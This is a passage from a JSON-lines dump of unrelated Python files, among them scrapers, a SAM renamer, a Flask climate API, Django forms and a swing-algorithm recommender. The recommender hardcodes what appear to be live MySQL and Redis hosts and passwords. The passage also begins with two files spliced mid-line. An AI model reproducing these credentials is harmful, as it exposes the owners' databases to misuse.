PILImageToCv,CVImageToPIL,reverse_one_hot\nfrom data_reader.utils import imshow\nfrom datetime import datetime\n\n\ndef loss(logit,label,num_classes):\n #logit.shape=[N2,num_classes,h2,w2],label.shape=[N1,3,h1,w1]\n num_classes_tensor=torch.full(label.shape,num_classes).cuda()\n #num_classes_tensor=num_classes_tensor.permute([0, 3, 1, 2])\n\n label_nignore=label 4) :\r\n pass\r\n threading._start_new_thread(downloadCeleb, (index, celeb, finished))\r\n\r\nwhile( finished.count('not')): \r\n pass\r\n","sub_path":"myscraper.py","file_name":"myscraper.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"33624044","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\n\ndef get_args():\n\tap = argparse.ArgumentParser(description=\"rename reference sequence names in SAM file to fulfill the picky \"\n\t\t\"flavour of anvi'o: a redemption if you forgot to reformat the names \"\n\t\t\"before mapping\")\n\tap.add_argument(\"input\", type=str, nargs=\"?\", default=\"-\",\n\t\thelp=\"input sam file (default: stdin)\")\n\tap.add_argument(\"-o\", \"--output\", type=str,\n\t\tmetavar=\"file\", default=\"-\", required=False,\n\t\thelp=\"output sam file (default: stdout)\")\n\tap.add_argument(\"--rename-table\", type=str,\n\t\tmetavar=\"file\", default=None, required=False,\n\t\thelp=\"if used, report the renaming table (default: off)\")\n\targs = ap.parse_args()\n\treturn args\n\n\nclass SeqNameEncoder(dict):\n\tdef encode(self, seq_name):\n\t\t\"\"\"\n\t\tencode an input seq name, return a string (new name) in format\n\t\ts_0000000000000001, s_0000000000000002, ...\n\t\tif the input header has been encountered previously, old result will be\n\t\treturned\n\t\t\"\"\"\n\t\treturn \"s_%016u\" % self.get_sid(seq_name)\n\n\tdef get_sid(self, seq_name):\n\t\t\"\"\"\n\t\treturn an integral seq id;\n\t\treturn the existing result if encountered previously\n\t\t\"\"\"\n\t\tsid = self.setdefault(seq_name, len(self) + 1)\n\t\t# debug\n\t\t# assert isinstance(sid, int), sid\n\t\treturn sid\n\n\nclass SAMStreamRenamer(object):\n\tclass SAMAlignemtRecord(list):\n\t\t@property\n\t\tdef rname(self):\n\t\t\treturn self[2]\n\n\t\t@rname.setter\n\t\tdef rname(self, _value):\n\t\t\tself[2] = _value\n\t\t\treturn\n\n\t\t@property\n\t\tdef rnext(self):\n\t\t\treturn self[6]\n\n\t\t@rnext.setter\n\t\tdef rnext(self, _value):\n\t\t\tself[6] = _value\n\t\t\treturn\n\n\tdef __init__(self, *ka, **kw):\n\t\tsuper(SAMStreamRenamer, self).__init__(*ka, **kw)\n\t\tself.encoder = SeqNameEncoder()\n\t\treturn\n\n\tdef _process_refseq(self, line) -> str:\n\t\t\"\"\"\n\t\trename a refseq's SN tag\n\t\t\"\"\"\n\t\tsp = line.split(\"\\t\") # is the only valid separator in SAM\n\t\tfor i, s in enumerate(sp):\n\t\t\tif s.startswith(\"SN:\"):\n\t\t\t\tsp[i] = \"SN:\" + self.encoder.encode(s[3:])\n\t\t\t\tbreak\n\t\treturn (\"\\t\").join(sp)\n\n\tdef _process_alignment(self, line) -> str:\n\t\t\"\"\"\n\t\trename an alignment record's RNAME and RNEXT fields\n\t\t\"\"\"\n\t\tif not line:\n\t\t\treturn line\n\t\taln = self.SAMAlignemtRecord(line.split(\"\\t\"))\n\t\tif aln.rname != \"*\":\n\t\t\t# '*' is missing, no changes made\n\t\t\taln.rname = self.encoder.encode(aln.rname)\n\t\tif (aln.rnext != \"*\") and (aln.rnext != \"=\"):\n\t\t\t# '*' is missing, '=' indicates identical to self.rname\n\t\t\t# in both cases, no changes made\n\t\t\taln.rnext = self.encoder.encode(aln.rnext)\n\t\treturn (\"\\t\").join(aln)\n\n\tdef process_line(self, sam_line):\n\t\t\"\"\"\n\t\tonly respond to the reference seqs and alignment section lines; change\n\t\treference seq names in those lines using self.encoder; other irrelavent\n\t\tlines will directly pass through;\n\t\t\"\"\"\n\t\tsam_line = sam_line.rstrip() # get rid of EOL\n\t\tif sam_line.startswith(\"@SQ\"):\n\t\t\treturn self._process_refseq(sam_line)\n\t\telif sam_line.startswith(\"@\"):\n\t\t\t# other header lines are returned without change\n\t\t\treturn sam_line\n\t\telse:\n\t\t\t# rest are alignment records\n\t\t\treturn self._process_alignment(sam_line)\n\n\ndef main():\n\targs = get_args()\n\tifp = (sys.stdin if args.input == \"-\" else open(args.input, \"r\"))\n\tofp = (sys.stdout if args.output == \"-\" else open(args.output, \"w\"))\n\trn = SAMStreamRenamer()\n\tfor line in ifp:\n\t\tofp.write(rn.process_line(line) + \"\\n\")\n\tif args.rename_table:\n\t\twith open(args.rename_table, \"w\") as fp:\n\t\t\tfor key in rn.encoder.keys():\n\t\t\t\tfp.write(\"%s\\t%s\\n\" % (key, rn.encoder.encode(key)))\n\tifp.close() # safe for stdin/stdout\n\tofp.close()\n\treturn\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"stream_sam_refseq_renamer.py","file_name":"stream_sam_refseq_renamer.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218401600","text":"def train(timesteps, env, eval_env, evaluate_every, evaluate_num, agent, logger,state):\n import numpy as np\n for timestep in range(timesteps):\n print(type(state))\n print(state)\n action = agent.step(state)\n next_state, reward, done = env.step(action)\n ts = (state, action, reward, next_state, done)\n agent.feed(ts)\n\n if timestep % evaluate_every == 0:\n rewards = []\n state = eval_env.reset()\n for _ in range(evaluate_num):\n action, _ = agent.eval_step(state)\n _, reward, done = env.step(action)\n if done:\n rewards.append(reward)\n logger.log_performance(env.timestep, np.mean(rewards))\n\n","sub_path":"r/leduc_single_agent/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"225914339","text":"'''\n\tProblem Url: https://www.hackerrank.com/challenges/clique/problem\n\tIdea: Turan's Theorem\n\tTurán's theorem states that if a graph on n vertices doesn't contain\n\tan (r+1)-clique then it has at most ⌊r−1*n*n/(r*2)⌋ edges\n\n\tfor large values:\n\t\tm* = (N*N - (N%r)*NR*NR - (r - (N%r))*nr*nr)/2\n'''\n\nimport math\n\ndef predicate(r):\n\tNR = math.ceil(N/r)\n\tnr = math.floor(N/r)\n\t\n\tm = (N*N - (N%r)*NR*NR - (r - (N%r))*nr*nr)/2\n\t# m = (r-1)*N*N/(2*(r))\n\treturn E > int(m)\n\ndef bs(l, r):\n\twhile l < r:\n\t\tm = l + r + 1 >> 1\n\t\tif predicate(m):\n\t\t\tl = m\n\t\telse:\n\t\t\tr = m - 1\n\treturn l\n\nt = int(input())\n\nfor _ in range(t):\n\tN, E = map(int, input().split())\n\tans = bs(0, N)\n\tprint(ans+1)","sub_path":"Hackerrank/hackerrank_(clique).py","file_name":"hackerrank_(clique).py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"48134833","text":"import httmock\nimport json\nimport os\nfrom server.lib.manifest import Manifest,\\\n clean_workspace_path\nfrom tests import base\n\n\ndef setUpModule():\n base.enabledPlugins.append('wholetale')\n base.startServer()\n\n\ndef tearDownModule():\n base.stopServer()\n\n\nclass ManifestTestCase(base.TestCase):\n\n def setUp(self):\n super(ManifestTestCase, self).setUp()\n users = ({\n 'email': 'root@dev.null',\n 'login': 'admin',\n 'firstName': 'Root',\n 'lastName': 'van Klompf',\n 'password': 'secret'\n }, {\n 'email': 'joe@dev.null',\n 'login': 'joeregular',\n 'firstName': 'Joe',\n 'lastName': 'Regular',\n 'password': 'secret'\n })\n self.admin, self.user = [self.model('user').createUser(**user)\n for user in users]\n\n def testCreateBasicAttributes(self):\n # Test that the basic attributes are correct\n manifest_doc = Manifest()\n\n tale_id = '12345'\n title = 'Tale Title'\n description = 'Tale description'\n category = 'science'\n version = 4\n image = 'imageURL'\n created = ''\n\n tale= {\n '_id': tale_id,\n 'title': title,\n 'description': description,\n 'category': category,\n 'version': version,\n 'image': image,\n 'created': created\n\n }\n attributes = manifest_doc.create_basic_attributes(tale)\n self.assertEqual(attributes['schema:identifier'], tale_id)\n self.assertEqual(attributes['schema:name'], title)\n self.assertEqual(attributes['schema:description'], description)\n self.assertEqual(attributes['schema:category'], category)\n self.assertEqual(attributes['schema:version'], version)\n self.assertEqual(attributes['schema:image'], image)\n\n def testGenerateTaleCreator(self):\n\n first_name = 'First'\n last_name = 'Last'\n email = 'email@anemailserver'\n tale_author = first_name + ' ' +last_name\n tale = {\n 'authors': tale_author\n }\n manifest_doc = Manifest()\n manifest_doc.generate_tale_creator(tale, self.users[0])\n\n self.assertEqual(['schema:givenName'], self.users[0]['firstName'])\n self.assertEqual(['schema:familyName'], self.users[0]['lastName'])\n self.assertEqual(['schema:email'], self.users[0]['email'])\n self.assertEqual(['@id'], tale['_id'])\n\n def testCreatContext(self):\n # Rather than check the contents of the context (subject to change), check that we\n # get a dict back\n manifest_doc = Manifest()\n context = manifest_doc.create_context()\n self.assertEqual(type(manifest_doc), type(dict()))\n\n def testCleanWorkspacePath(self):\n # Test that the Tale ID is removed\n path = 'mydatapath/moredata'\n tale_id = '123456'\n res = clean_workspace_path(tale_id, path+tale_id)\n self.assertEqual(res, path)\n\n# def testManifestGeneration(self):\n# manifest_doc = Manifest(license,)\n\n\n# manifest_doc.generate_manifest(self.users[0], tale)\n\n\n def tearDown(self):\n self.model('user').remove(self.user)\n self.model('user').remove(self.admin)\n super(ManifestTestCase, self).tearDown()\n\n","sub_path":"plugin_tests/manifest_test.py","file_name":"manifest_test.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574143617","text":"import numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\nimport datetime as dt\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n session = Session(engine)\n\n # Query all prcp data\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n first_date = session.query(Measurement.date).order_by(Measurement.date).first()\n session.close()\n \n \"\"\"List all available api routes.\"\"\"\n return (\n f\"SQLAlchemy Homework - Surfs Up!
\"\n f\"Step 2- Climate App
\"\n f\"
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/YYYY-MM-DD
\"\n f\"/api/v1.0/YYYY-MM-DD/YYYY-MM-DD
\"\n f\"
\"\n f\"Please note the following for query on date.
\"\n f\"Date format: YYYY-MM-DD
\"\n f\"First: based on start date only
\"\n f\"
\"\n f\"Route based on start date:
\"\n f\"/api/v1.0/YYYY-MM-DD
\"\n f\"Change YYYY-MM-DD with the date you selected
\"\n f\"
\"\n f\"Second: based on start date and end date
\"\n f\"First YYYY-MM-DD after /v1.0 is for start date.
\"\n f\"Last YYYY-MM-DD is for end date.
\"\n f\"
\"\n f\"Route based on start date and end date:
\"\n f\"/api/v1.0/YYYY-MM-DD/YYYY-MM-DD
\"\n f\"Change both YYYY-MM-DD with the date you selected.
\"\n f\"
\"\n f\"Please select between {first_date[0]} and {last_date[0]}\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precip():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list \n weather_data = []\n for date, prcp in results:\n weather_dict = {}\n weather_dict[\"date\"] = date\n weather_dict[\"prcp\"] = prcp\n weather_data.append(weather_dict)\n\n return jsonify(weather_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n results = session.query(Station.station, Station.name, Station.latitude , Station.longitude , Station.elevation).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list \n stations_data = []\n for station, name, latitude, longitude, elevation in results:\n stations_dict = {}\n stations_dict[\"station\"] = station\n stations_dict[\"name\"] = name\n stations_dict[\"latitude\"] = latitude\n stations_dict[\"longitude\"] = longitude\n stations_dict[\"elevation\"] = elevation\n stations_data.append(stations_dict)\n\n return jsonify(stations_data)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n\n lastdate_yr = int(last_date[0].split('-')[0])\n lastdate_mth = int(last_date[0].split('-')[1])\n lastdate_day = int(last_date[0].split('-')[2])\n \n from dateutil.relativedelta import relativedelta\n a_year_ago = dt.date(lastdate_yr, lastdate_mth, lastdate_day) - relativedelta(years=1)\n \n #results = session.query(Measurement.date, Measurement.tobs).all()\n results = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= a_year_ago).all()\n \n session.close()\n\n # Create a dictionary from the row data and append to a list \n temperature_data = []\n for date, tobs in results:\n temp_dict = {}\n temp_dict[\"date\"] = date\n temp_dict[\"tobs\"] = tobs\n temperature_data.append(temp_dict)\n\n return jsonify(temperature_data)\n\n@app.route(\"/api/v1.0/\")\ndef startdate(start):\n \"\"\"When given the start only, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\"\"\"\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n \n All_temps = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs ), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= last_date[0]).all()\n \n session.close()\n\n return jsonify(All_temps)\n\n return jsonify({\"error\": f\"No Data for selected start date.\"}), 404\n\n@app.route(\"/api/v1.0//\")\ndef startend(start,end):\n \"\"\"When given the start and the end date, calculate the TMIN, TAVG, and TMAX for dates between the start and end date inclusive.\"\"\"\n \n All_temps = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n \n session.close()\n\n return jsonify(All_temps)\n\n return jsonify({\"error\": f\"No Data for selected start date.\"}), 404\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"HW10 SQLAlchemy-Challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355170066","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom .views import MailboxViewSet, EmailViewSet, TemplateViewSet\n\napp_name = \"api\"\n\nrouter = routers.DefaultRouter()\nrouter.register('mailbox', MailboxViewSet)\nrouter.register('template', TemplateViewSet)\nrouter.register('email', EmailViewSet)\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n]\n","sub_path":"email_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"552895735","text":"#!/usr/bin/env python3\n# author:Alnk(李成果)\nimport os\nfrom atm.conf.settings import user_info_path, log_path\nfrom atm.core.basic import Basic\nfrom atm.core.log import get_logger\n\nclass Login(Basic): # 认证类\n\n def login(self, name=None, pwd=None):\n if name==None and pwd==None:\n name = input('卡号用户名>>>')\n pwd = input('密码>>>')\n file_path = os.path.join(user_info_path, '%s.json' % name)\n if os.path.isfile(file_path):\n user_dict = self.read_dict(file_path)\n else:\n print('账号或者密码错误!')\n return False\n if name == user_dict['name'] and pwd == user_dict['pwd'] and user_dict['state'] == 1:\n user_log_path = os.path.join(log_path, '%s.log' % name)\n log_msg = '卡号[%s]登录成功!' % name\n get_logger(user_log_path, log_msg) # 写入日志\n print('登录成功!\\n')\n return user_dict\n else:\n print('登录失败,联系管理员')\n return False\n","sub_path":"08 day08/03 作业 day08/atm/core/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"260348646","text":"from urllib import request\nfrom bs4 import BeautifulSoup as bs\n\n#获取网站文本标签\nresp=request.urlopen(\"http://www.136book.com/\")\nhtml_data= resp.read().decode('utf-8')\n\n#解析html标签\nsoup=bs(html_data,'html.parser')\n\nbook=soup.find('div',id='digg_list')\nbook_ul=book.find('ul')\nbook_list=book_ul.find_all('li')\n\nbook_hot_show=[]\nprint(\"热门小说推荐:\")\nfor item in book_list:\n dict={}\n dict['链接'] = item.find('a')['href']\n dict['书名']=item.find('img')['title']\n print(dict)\n book_hot_show.append(dict)\n\nbook=soup.find('div',id='newly_list')\nbook_ul=book.find('ul')\nbook_list=book_ul.find_all('li')\n\nbook_new_show=[]\nprint(\"最新小说推荐:\")\nfor item in book_list:\n dict={}\n dict['链接'] = item.find('a')['href']\n dict['书名']=item.find('img')['title']\n print(dict)\n book_new_show.append(dict)","sub_path":"No11/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85253882","text":"from django import forms\r\nfrom apps.valida_plan.models import Ges_Observaciones, Ges_Controlador, Ges_Jefatura\r\nfrom apps.actividades.models import Ges_Actividad\r\nfrom django.contrib.auth.models import User\r\nfrom apps.jefaturas.models import Ges_Jefatura\r\n\r\n\r\n\r\nclass RechazaPlanUpdateForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Controlador\r\n\r\n fields = [\r\n 'estado_flujo',\r\n # 'jefatura_segundarevision'\r\n ]\r\n\r\n widgets = {\r\n\r\n 'estado_flujo': forms.TextInput(attrs={'class': 'form-control'}),\r\n # 'jefatura_segundarevision': forms.TextInput(attrs={'class': 'form-control'}),\r\n }\r\n\r\n#############################################################################################################\r\n#############################################################################################################\r\n#############################################################################################################\r\n\r\n\r\nclass ValidaPlanObservacionesForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Observaciones\r\n\r\n fields = [\r\n 'observacion',\r\n\r\n ]\r\n widgets = {\r\n\r\n 'observacion': forms.Textarea(attrs={'class': 'form-control' , 'style':'width:535px; '}),\r\n\r\n }\r\n\r\n\r\nclass ObservacionForm(forms.ModelForm): #Class agregada por JR - OK\r\n def __init__(self, id_user, *args, **kwargs):\r\n self.request = kwargs.pop('request', None)\r\n super(ObservacionForm, self).__init__(*args, **kwargs)\r\n self.fields['user_observa'].queryset = User.objects.filter(id=id_user)\r\n\r\n\r\n class Meta:\r\n model = Ges_Observaciones\r\n\r\n fields = [\r\n 'fecha_registro',\r\n 'user_observa',\r\n 'observacion',\r\n\r\n ]\r\n widgets = {\r\n\r\n 'fecha_registro': forms.DateTimeInput(attrs={'class': 'form-control','style':'width:535px;','readonly':'True'}),\r\n 'user_observa': forms.Select(attrs={'class': 'form-control','style':'width:535px;','readonly':'True'}),\r\n 'observacion': forms.Textarea(attrs={'class': 'form-control' , 'style':'width:535px;','readonly':'True'}),\r\n\r\n }\r\n\r\nclass ValidaPlanUpdateForm(forms.ModelForm):\r\n\r\n def __init__(self,nivel_jefatura, *args, **kwargs):\r\n self.request = kwargs.pop('request', None)\r\n super(ValidaPlanUpdateForm, self).__init__(*args, **kwargs)\r\n\r\n self.fields['jefatura_segundarevision'].queryset = Ges_Jefatura.objects.filter(id_nivel_id=nivel_jefatura)\r\n\r\n\r\n\r\n\r\n\r\n class Meta:\r\n model = Ges_Controlador\r\n fields = [\r\n\r\n 'estado_flujo',\r\n 'id_jefatura',\r\n 'jefatura_segundarevision',\r\n 'nivel_inicial'\r\n\r\n ]\r\n\r\n widgets = {\r\n\r\n 'estado_flujo': forms.Select(attrs={'class': 'form-control', 'readonly':'readonly'}),\r\n 'jefatura_segundarevision': forms.Select(attrs={'class': 'form-control'}),\r\n\r\n 'id_jefatura': forms.Select( attrs={'class': 'form-control', 'readonly':'readonly'}),\r\n\r\n }\r\n\r\n\r\nclass Valida_plan_DetalleForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Actividad\r\n fields = [\r\n\r\n 'id_periodicidad',\r\n 'horas_actividad',\r\n 'volumen',\r\n 'personas_asignadas',\r\n 'total_horas',\r\n 'id_producto_estadistico',\r\n 'id_estado_actividad',\r\n\r\n\r\n ]\r\n\r\n widgets = {\r\n\r\n 'id_producto_estadistico': forms.Select(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'id_periodicidad': forms.Select(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'horas_actividad': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'volumen': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'personas_asignadas': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'total_horas': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'id_estado_actividad': forms.Select(attrs={'class': 'form-control'}),\r\n\r\n\r\n }\r\n","sub_path":"apps/valida_plan/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135598821","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@File : swing_online.py\n@Author : shijun\n@Contact : shijunwu@whu.edu.cn\n@Modify Time : 2023/3/29 6:41 下午\n@Description : None\n\"\"\"\nimport time\n\nimport pymysql\nfrom itertools import combinations\nimport pandas as pd\nfrom tqdm import tqdm\nimport redis\n\n\ndef get_train_data():\n host = 'rm-gw8lgrwcb14316o05.mysql.germany.rds.aliyuncs.com'\n db = pymysql.connect(host=host, user='eagleee', password='Fyt98Zi76rtsW2')\n cursor = db.cursor()\n sql = '''\n select *\n from scooper_bi.user_action_statistic_recommend\n '''\n print(sql)\n cursor.execute(sql)\n # 拿到表头\n des = cursor.description\n title = [each[0] for each in des]\n print(title)\n # 获取所有记录列表\n results = cursor.fetchall()\n # 保存成dataframe\n df_ori = pd.DataFrame(results, columns=title)\n df_ = df_ori\n # ======================\n df_['user_id'] = df_.index\n print(\"data num: \", df_.shape)\n print(df_.head())\n df_['news_id'] = df_[['news_ids']].applymap(lambda x:x.split(\",\"))\n # df_['len'] = df_[['news_ids']].applymap(lambda x:len(x))\n # df_ = df_[df_['len'] > 200]\n print(\"data num: \", df_.shape)\n df_ = df_[['user_id', 'news_id']].explode(\"news_id\")\n # ======================\n # df_['news_ids'] = df_[['news_ids']].applymap(lambda x: x.split(\",\"))\n # df_ = df_[['dpid', 'news_ids']].explode(\"news_ids\")\n # df_.rename(columns={'dpid': 'user_id', 'news_ids': 'news_id'}, inplace=True)\n # ======================\n print(\"data num: \", df_.shape)\n print(df_.head())\n return df_\n\n\ndef get_uitems_iusers(df):\n u_i = df.groupby('user_id')['news_id'].agg(set)\n u_i = u_i[u_i.apply(lambda x: len(x) >= user_news_series_len_min)]\n u_items = dict(u_i)\n i_u = df.groupby('news_id')['user_id'].agg(set)\n i_u = i_u[i_u.apply(lambda x: len(x) >= item_user_series_min)]\n i_users = dict(i_u)\n # 如何将series转���为字典\n return u_items, i_users # dict(x): pd.Series to dict\n\n\ndef get_data(user_news_series_len_min=1, item_user_series_min=1):\n host = 'rm-gw8lgrwcb14316o05.mysql.germany.rds.aliyuncs.com'\n db = pymysql.connect(host=host, user='eagleee', password='Fyt98Zi76rtsW2')\n cursor = db.cursor()\n sql = '''\n select *\n from scooper_bi.user_action_statistic_recommend\n '''\n print(sql)\n cursor.execute(sql)\n # 拿到表头\n des = cursor.description\n title = [each[0] for each in des]\n print(title)\n # 获取所有记录列表\n results = cursor.fetchall()\n # 保存成dataframe\n df_ori = pd.DataFrame(results, columns=title)\n df_ = df_ori\n df_['user_id'] = df_.index\n print(df_.head())\n print(\"data num: \", df_.shape)\n df_['news_id'] = df_[['news_ids']].applymap(lambda x: x.split(\",\"))\n print(df_.head())\n print(\"data num: \", df_.shape)\n df = df_[['user_id', 'news_id']].explode(\"news_id\")\n u_i = df.groupby('user_id')['news_id'].agg(set)\n u_i = u_i[u_i.apply(lambda x: len(x) >= user_news_series_len_min)]\n u_items = dict(u_i)\n i_u = df.groupby('news_id')['user_id'].agg(set)\n i_u = i_u[i_u.apply(lambda x: len(x) >= item_user_series_min)]\n i_users = dict(i_u)\n # 如何将series转换为字典\n return u_items, i_users # dict(x): pd.Series to dict\n\n\ndef swing_model_old(u_items, i_users):\n print(\"用户数量 len(u_items.keys()): \", len(u_items.keys()))\n print(\"新闻数量 len(i_users.keys()): \", len(i_users.keys()))\n item_pairs = list(combinations(i_users.keys(), 2)) # 全排列组合对\n print(\"新闻对数量 len(item_pairs): \", len(item_pairs))\n item_sim_dict = dict()\n for (i, j) in tqdm(item_pairs): # 这一步需要计算所有的item_i和item_j的相似度,非常耗时,速度慢\n user_pairs = list(combinations(i_users[i] & i_users[j], 2)) # item_i和item_j对应的user取交集后组合 得到user对\n result = 0\n for (u, v) in user_pairs:\n result += 1 / (alpha + list(u_items[u] & u_items[v]).__len__()) # 分数公式\n if result != 0:\n item_sim_dict.setdefault(i, dict()) # 如果没有key i,则添加键值对{ i : dict() }\n item_sim_dict[i][j] = format(result, '.3f') # i的字典中添加键值对{j: 0.2741}。保存物品i和物品j的相似度\n item_sim_dict.setdefault(j, dict())\n item_sim_dict[j][i] = format(result, '.3f')\n return item_sim_dict\n\n\ndef swing_model(u_items, i_users):\n item_sim_dict = dict()\n item_id_list = list(i_users.keys())\n item_num = len(item_id_list)\n print(\"用户数量 len(u_items.keys()): \", len(u_items.keys()))\n print(\"新闻数量 len(i_users.keys()): \", len(i_users.keys()))\n # 这一步需要计算所有的item_i和item_j的相似度,非常耗时,速度慢, 全排列组合对\n for i_in in tqdm(range(item_num)):\n for j_in in range(i_in + 1, item_num):\n i = item_id_list[i_in]\n j = item_id_list[j_in]\n user_pairs = list(combinations(i_users[i] & i_users[j], 2)) # item_i和item_j对应的user取交集后组合 得到user对\n result = 0\n for (u, v) in user_pairs:\n Wu = pow(len(u_items[u]) + 5, -0.35)\n Wv = pow(len(u_items[v]) + 5, -0.35)\n Wpair = Wu * Wv\n result += Wpair / (alpha + list(u_items[u] & u_items[v]).__len__()) # 分数公式\n if result != 0:\n item_sim_dict.setdefault(i, dict()) # 如果没有key i,则添加键值对{ i : dict() }\n item_sim_dict[i][j] = format(result, '.3f') # i的字典中添加键值对{j: 0.2741}。保存物品i和物品j的相似度\n item_sim_dict.setdefault(j, dict())\n item_sim_dict[j][i] = format(result, '.3f')\n return item_sim_dict\n\n\ndef get_top_k(item_sim_dict, top_k=3): # 与item相似的前 k 个item\n print(\"输出每个物品的最相似的top-k个物品,以及对应的相似度\")\n new_item_sim_dict = dict()\n for item, sim_items in item_sim_dict.items():\n new_item_sim_dict.setdefault(item, dict())\n new_item_sim_dict[item] = dict(\n sorted(sim_items.items(), key=lambda k: k[1], reverse=True)[:top_k]) # 排序取出 top_k个相似的item\n return new_item_sim_dict\n\n\ndef save2redis(data_):\n # 将数据存储到Redis中\n pool = redis.ConnectionPool(host='r-gw8f128338c863d4.redis.germany.rds.aliyuncs.com',\n password='HLwrFv4lpXemqHqY',\n port=6379,\n db=8)\n r = redis.Redis(connection_pool=pool)\n for item, sim_items in data_.items():\n # 将数据存储到Redis中\n sim_items = \",\".join([str(k) + \":\" + str(v) for k, v in sim_items.items()])\n r.set(item, sim_items, ex=60 * 60 * 24 * 15)\n\n\nif __name__ == '__main__':\n print('扛起大刀向前冲!!!')\n \"\"\"\n 启动定时任务 \n [root@engine-172-20-16-2 swing]# crontab -l # 展示有哪些定时任务\n 00 */4 * * * cd /root/swing && /usr/local/bin/python3 swing.py\n [root@engine-172-20-16-2 swing]# \n [root@engine-172-20-16-2 swing]# crontab -e # 编辑定时任务\n \"\"\"\n alpha = 1 # 平滑因子\n user_news_series_len_min = 10\n item_user_series_min = 20\n u_items, i_users = get_data(user_news_series_len_min, item_user_series_min)\n print(\"u_items:\", len(u_items))\n print(\"i_users: \", len(i_users))\n\n item_sim_dict = swing_model(u_items, i_users)\n print(len(item_sim_dict))\n\n res_item_sim_dict = get_top_k(item_sim_dict, top_k=30)\n\n save2redis(res_item_sim_dict)\n\n # for item, sim_items in res_item_sim_dict.items():\n # print(item, sim_items)\n # print(item, \",\".join([str(k) + \":\" +str(v) for k,v in sim_items.items()]))\n # print()\n # time.sleep(1)\n\n\n","sub_path":"trrassion/recall/swing/swing_online.py","file_name":"swing_online.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70753940","text":"'''\n \tAuthor :- Tanay Kulkarni\n\tDate :- 5-5-2021\n\tTime :- 18:22:59.805116\n\tName :- solve.py\n''' \nfrom random import *\ndef debug(*a):\n\tprint(a)\ndef read(typ = str):\n\treturn typ(input())\ndef read_arr(typ):\n\treturn list(map(typ,input().split()))\n \ndef solve():\t\n\tn = read(int)\n\ts = read()\n\tfor i in range(n):\n\t\tok = False\n\t\tfor j in 